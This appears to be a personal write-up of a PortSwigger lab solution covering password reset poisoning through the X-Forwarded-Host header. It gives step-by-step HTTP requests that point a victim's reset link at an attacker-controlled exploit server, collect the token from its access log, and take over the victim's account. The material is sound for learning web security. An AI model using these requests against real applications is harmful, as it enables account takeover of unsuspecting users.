[This lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware) demonstrates a **password reset poisoning attack** via the `X-Forwarded-Host` header, allowing full compromise of another user's account by injecting an attacker-controlled domain into password reset links. The vulnerability is rooted in **trusting unsanitized headers when generating absolute URLs**, a common middleware misconfiguration. --- #### Lab Context * Attacker credentials: `wiener:peter` * Victim username: `carlos` * Emails sent during password reset can be monitored via the **exploit server's email client** #### Step 1: Trigger Password Reset and Observe Header Behavior Send a POST request to initiate password reset: ``` POST /forgot-password Content-Type: application/x-www-form-urlencoded username=wiener ``` Observe that the server sends an email containing a reset link structured like: ![[CleanShot 2025-07-14 at 23.05.49.png]] The domain in this link is based on headers provided by the client. --- #### Step 2: Poison the Host Header Send the same request to Burp Repeater, but modify the headers as follows: ``` POST /forgot-password Host: vulnerable-application.com X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net Content-Type: application/x-www-form-urlencoded username=carlos ``` ![[CleanShot 2025-07-14 at 23.07.57.png]] Effect: The backend will generate the password reset link using the attacker-controlled domain. Carlos will receive: ``` https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/forgot-password?temp-forgot-password-token=<victim-token> ``` --- #### Step 3: Capture the Reset Token * Wait for Carlos to click the link (he automatically does so). * Open the **access log** of your exploit server. * You’ll see a request like: ``` GET /forgot-password?temp-forgot-password-token=abcdef123456... ``` Copy the token value. --- #### Step 4: Forge the Reset Request Using the Stolen Token In your email inbox (wiener’s account), get the reset link (which points to the original domain). It will look like: ``` https://vulnerable-application.com/forgot-password?temp-forgot-password-token=<your-token> ``` Replace the token with Carlos's token from the exploit server: ``` https://vulnerable-application.com/forgot-password?temp-forgot-password-token=abcdef123456... ``` Visit the modified URL. Set a new password for Carlos. --- #### Step 5: Log in as Carlos Use: ``` username: carlos password: <your-new-password> ``` Access the **My Account** page. Lab solved.